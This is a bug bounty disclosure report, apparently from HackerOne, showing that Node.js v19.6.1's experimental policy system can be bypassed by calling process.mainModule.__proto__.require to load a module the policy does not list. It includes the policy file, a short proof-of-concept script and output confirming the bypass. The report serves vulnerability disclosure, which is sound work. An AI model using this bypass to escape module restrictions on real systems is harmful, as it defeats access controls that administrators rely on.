Node.js: The use of proto in process.mainModule.proto.require() bypasses the permission system in Node v19.6.1

2023-02-1717:58:20

haxatron1

hackerone.com

node.js

bypass

permission system

\_\_proto\_\_

v19.6.1

bug bounty

0.001 Low

EPSS

Percentile

22.0%

JSON

process.mainModule.require() correctly works with permission system in Node v19.6.1.
But the use of __proto__ in process.mainModule.__proto__.require() can bypass the check.

Description and STR

Consider the following policy.json:

{
  "resources": {
    "./proc.js": {
      "integrity": true
    }
  }
}

The policy only allows proc.js file to be loaded without any dependencies.

However with the following proc.js

const os = process.mainModule.__proto__.require("os")

console.log(process.version)
console.log(os.version())

We get the output:

└─$ ../node-v19.6.1-linux-x64/bin/node --experimental-policy=policy.json proc.js
v19.6.1
#1 SMP PREEMPT Debian 5.16.18-1kali1 (2022-04-01)
(node:2720) ExperimentalWarning: Policies are experimental.
(Use `node --trace-warnings ...` to show where the warning was created)

Therefore os dependency can be loaded and os.version executed even if unspecified in permission system.